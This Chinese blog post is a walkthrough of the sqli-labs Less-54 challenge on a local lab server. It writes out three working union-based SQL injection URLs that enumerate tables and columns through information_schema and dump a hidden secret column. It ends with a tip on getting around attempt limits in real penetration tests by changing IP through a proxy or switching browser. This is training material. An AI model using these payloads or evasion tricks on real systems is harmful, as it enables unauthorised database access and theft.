Sqli-labs less 54
2016-08-11 21:30
501 查看
第四部分/page-4 Challenges
Less-54
此系列主要是一个进阶的学习,将前面学到的知识进行更深次的运用。这一关我们主要考察的依旧是字符型注入,但是只能尝试十次。所以需要在尝试的时候进行思考。如何能更少的减少次数。这里的表名和密码等是每十次尝试后就强制进行更换。因为已经知道了数据库名字叫做challenges,所以我们需要知道表名。
http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27--+
![](https://images2015.cnblogs.com/blog/669054/201608/669054-20160811212926187-1576746931.png)
已经得到表名为J035VPGANL(当然你测试的时候应该不是这个),接下来就是要找到该表的所有列
http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27J035VPGANL%27--+
![](https://images2015.cnblogs.com/blog/669054/201608/669054-20160811212929609-1448558554.png)
我们得到了所有的列,可以尝试将所有的数据进行查看,此处知道了密码在secret_O8GE列中,所以我们直接查看该列的内容
http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1%27union%20select%201,2,group_concat(secret_O8GE)%20from%20challenges.J035VPGANL--+
![](https://images2015.cnblogs.com/blog/669054/201608/669054-20160811212933312-876994414.png)
将得到的密码进行提交。此处没有进行截图,可自行测试观看效果。
其实实际渗透测试当中,我们可以利用更换ip(可以考虑代理)或者更换浏览器等,要看服务器端检测什么内容进行限制。
相关文章推荐
- Sqli-labs less 35
- Sqli-labs less 16
- Sqli-labs之Less1-10
- SQLi Labs Challenges ( Lesson54 - Lesson65 )
- Sqli-labs less 33
- Sqli-labs less 25a
- Sqli-labs less 13
- Sqli-labs less 48
- ④sqlilabs的less-3和less-4
- Sqli-labs less 62
- Sqli-labs less 46
- Sqli-labs less 12
- sqli-labs ---- Less-2
- Sqli-labs less 45
- Sqli-labs less 31
- Sqli-labs less 65
- Sqli-labs less 44
- Sqli-labs less 29
- Sqli-labs less 9
- sqlilabs 下的less7